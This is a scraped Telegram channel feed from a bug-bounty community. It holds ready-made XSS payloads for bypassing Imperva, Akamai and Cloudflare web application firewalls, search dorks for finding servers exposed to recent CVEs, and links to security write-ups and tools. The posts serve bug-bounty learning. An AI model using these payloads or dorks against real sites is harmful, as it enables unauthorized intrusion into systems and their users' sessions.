Brut Security
14.6K subscribers
907 photos
73 videos
287 files
962 links
โœ…Queries: @wtf_brut
๐Ÿ›ƒWhatsApp: wa.link/brutsecurity
๐ŸˆดTraining: brutsec.com
๐Ÿ“จE-mail: [email protected]
Download Telegram
โšก๏ธFound a security vulnerability in any site?
โœ…Check if it has a public bug bounty program:

https://xplo1t-sec.github.io/bugbounty-lookup/

#BugBounty #bugbountytips
1โค6๐Ÿ”ฅ3๐Ÿณ1
A solid XSS payload that bypasses Imperva WAF โš™๏ธ

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips
1๐Ÿ”ฅ9๐Ÿณ3
Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:โš™๏ธ

/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
1๐Ÿ”ฅ5๐Ÿ‘4๐Ÿณ2
Cloudflare #XSS WAF Bypass by @nav1n0x

Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 


#cybersec #bugbountytips #infosec
1๐Ÿ‘10๐Ÿ—ฟ3๐Ÿณ1
an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">


#infosec #cybersec #bugbountytips
1โค9
Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"


Replace example.com with the target domain.
26๐Ÿ—ฟ12โค7๐Ÿ‘2
Brut Security pinned ยซ๐ŸšจIf you're looking for accurate IoT results, then Sign Up On @Netlas ๐Ÿ˜ฎโ€๐Ÿ’จhttps://app.netlas.io/ref/9cc61538/ยป
1)Finding a Hidden GraphQL Endpoint
https://medium.com/@codingbolt.in/finding-a-hidden-graphql-endpoint-56001ab29f85

2)My 2nd bounty : Referer-based access control + Response manipulation
https://medium.com/@adebayosec/my-2nd-bounty-referer-based-access-control-response-manipulation-2ab7f54d083f

3)CSRF Bypass Using Domain Confusion Leads To ATO
https://infosecwriteups.com/csrf-bypass-using-domain-confusion-leads-to-ato-ac682dd17722

4)Linear-feedback. Shift. Register
https://cyancharley.medium.com/linear-feedback-shift-register-ac6fc3298c35

5)ASCWG Reverse Engineering challenges
https://s3dny.medium.com/ascwg-reverse-engineering-challenges-778e47a5be80

6)picoCTF: No SQL Injection
https://medium.com/@baracarlo/picoctf-no-sql-injection-93a253cc4d09

7)Sunset:1 Walkthrough
https://medium.com/@nikhilbwr34/sunset-1-walkthrough-d124d06fcc93

8)Gixposed is a powerful command-line tool designed to search the commit history of Git repositories for sensitive information, such as API keys and access tokens
https://github.com/WH1T3-E4GL3/gixposed

9)MM-ReverseIPLookup created to take a domain name and find all (A) records associated with an IP address Using Free Multiple sources,
https://github.com/FINAL094/MM-ReverseIPLookup

10)Hidden secrets and urls in JS Mass hunting || Bug bounty POC
https://www.youtube.com/watch?v=HAAG5_mSxdk
๐Ÿ‘7โค2
CVE-2024-46483: Integer Overflow in Xlight FTP Server, 9.8 rating ๐Ÿ”ฅ

By overflowing the variable, an attacker could cause remote code execution on the host or a denial of service.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/M8D2R
๐Ÿ‘‰ Dork: \*.banner:"Xlight" OR raw_tcp.response_data:"Xlight"

Read more: https://github.com/kn32/cve-2024-46483
๐Ÿ‘3โค2
โšก๏ธParameter that could be vulnerable to server side request forgery !
โค13๐Ÿ‘3
Pre-Auth RCE CyberPanel 0day by Chirag Artani ๐Ÿ”ฅ

Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search ๐Ÿ”Ž

We also recommend checking out his website and Twitter for more tips:

๐Ÿ‘‰ Site: 3rag.com
๐Ÿ‘‰ Twitter: x.com/Chirag99Artani
๐Ÿ”ฅ4โค3๐Ÿ‘1
๐Ÿšจ Warning to All Members ๐Ÿšจ

Brut Security is a professional community focused strictly on learning and discussing cybersecurity topics. Any personal questions about religion, race, or similar matters are strictly prohibited. We are here to learn and grow as ethical hackers, not to engage in discussions unrelated to cybersecurity.

Please adhere to these guidelines:

1. Keep all conversations focused on cybersecurity topics.
2. Avoid personal questions about membersโ€™ religious or cultural backgrounds.
3. Show respect for all membersโ€”this is a safe, professional space.

Failure to follow these rules will lead to immediate removal from the group.

For Queries Related to Enrolment or Other Questions, Do Reach here @brutsecurity_bot
๐Ÿ”ฅ12โค11๐Ÿ‘6
โš ๏ธJoin Our Discussion Group โš ๏ธ
๐Ÿ”ฅ https://t.iss.one/brutsec ๐Ÿ”ฅ
Please open Telegram to view this post
VIEW IN TELEGRAM
Happy Diwali to the Brut Security Community!

Wishing everyone a joyful and prosperous Diwali! May this festival of lights bring happiness, success, and new learning opportunities to all.

Whether youโ€™re celebrating or just enjoying the festive spirit, let's continue to shine brightly together as a global community. Hereโ€™s to knowledge, growth, and unity!

Stay safe, stay inspired, and Happy Diwali! ๐Ÿช”
1โค15๐Ÿ‘2
CVE-2024-50550: Privilege Escalation in LiteSpeed Cache WP Plugin, 8.1 rating ๐Ÿ”ฅ

Weak security hash verification vulnerability allows an attacker to gain administrative privileges.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/A60iV
๐Ÿ‘‰ Dork: http.body:"plugins/litespeed-cache"

Read more: https://patchstack.com/articles/rare-case-of-privilege-escalation-patched-in-litespeed-cache-plugin/
๐Ÿ‘3
Best Motivation Tip Ever
1โค25๐Ÿ‘2๐Ÿ”ฅ1
Brut Security
Best Motivation Tip Ever
But Our Bro is Killing It ๐Ÿ˜‚๐Ÿ˜‚ Happy Diwali and ๐ŸŽƒ
๐Ÿ—ฟ12๐Ÿ”ฅ5๐Ÿ‘1๐Ÿณ1
CVE-2024-49768: Race Condition in Waitress Python server, 9.1 rating ๐Ÿ”ฅ

Due to an error, the server can process a request even if the connection should have been closed.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/VYS9t
๐Ÿ‘‰ Dork: http.headers.server:"waitress"

Vendor's advisory: https://github.com/Pylons/waitress/security/advisories/GHSA-9298-4cf8-g4wj
๐Ÿ‘2๐Ÿ—ฟ2
Setup and host your own blind XSS and SSRF testing tool for free https://github.com/Rahim7X/Argus.git
2๐Ÿ”ฅ9๐Ÿ‘2
๐Ÿ—ฟ18๐Ÿ”ฅ7๐Ÿณ2โค1